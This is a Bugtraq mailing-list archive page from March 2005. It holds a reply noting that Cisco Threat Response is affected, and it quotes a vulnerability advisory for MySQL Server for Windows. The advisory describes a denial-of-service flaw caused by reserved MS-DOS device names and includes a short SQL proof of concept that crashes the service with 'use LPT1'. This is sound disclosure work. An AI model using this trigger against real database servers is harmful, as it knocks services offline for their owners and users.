Bugtraq mailing list archives
RE: Denial of Service Vulnerability in MySQL Server for Windows
From: "BugTrap" <bugtrap () InterCept Net>
Date: Wed, 16 Mar 2005 11:49:37 -0500
Cisco threat response 2.0.5.138 for Cisco's IDS Appliances is vulnerable to this. Thanks, Michael Brown -----Original Message----- From: Luca Ercoli [mailto:io () lucaercoli it] Posted At: Tuesday, March 15, 2005 1:47 PM Posted To: BugTrap Conversation: Denial of Service Vulnerability in MySQL Server for Windows Subject: Denial of Service Vulnerability in MySQL Server for Windows Package: MySQL Database Server for Windows Auth: http://www.mysql.com/ Version(s): 4.1.XX/4.0.XX/5.0.XX Vulnerability Type: Denial of Service Disclaimer: ========== The information is provided "as is" without warranty of any kind. The author of this issue shall not be held liable for any downtime, lost profits, or damages due to the informations contained in this advisory. What's MySQL: ============ MySQL is a multi-user, multi-threaded relational database management system. The MySQL database server is the world's most popular open source database. Vulnerability Description: ========================= A vulnerability exist in the way application handle requests containing reserved MS-DOS devices name (AUX,CON,COM1,LPT1 and PRN). This flaw allows an authenticaded user with at least one of those privileges globally (on *.*): - REFERENCES - CREATE TEMPORARY TABLES - GRANT OPTION - CREATE - SELECT to cause the service to fail. Proof of Concept: ================ 1- Create an user account: (connected as 'root') use mysql; INSERT INTO user (Host,User,Password) VALUES('%','customer',PASSWORD('customer')); 2- Grant to him one or more privileges reported above: (connected as 'root') GRANT CREATE TEMPORARY TABLES ON *.* TO 'customer'@'%'; flush privileges; 3- Connect to server using new account and 'use' the database 'LPT1': (connected as 'customer') use LPT1; Vendor Status: ============= http://bugs.mysql.com/ ID: 9148 Updated by: Miguel Solorzano Reported by: Luca Ercoli User Type: User Status: Verified Severity: S2 (Serious) Category: Server Operating System: Windows -Version: 4.1.9 +Version: 4.1.XX/4.0.XX/5.0.XX Credits: --- Luca Ercoli io [at] lucaercoli.it www.lucaercoli.it
Current thread:
- Denial of Service Vulnerability in MySQL Server for Windows Luca Ercoli (Mar 15)
- <Possible follow-ups>
- RE: Denial of Service Vulnerability in MySQL Server for Windows BugTrap (Mar 16)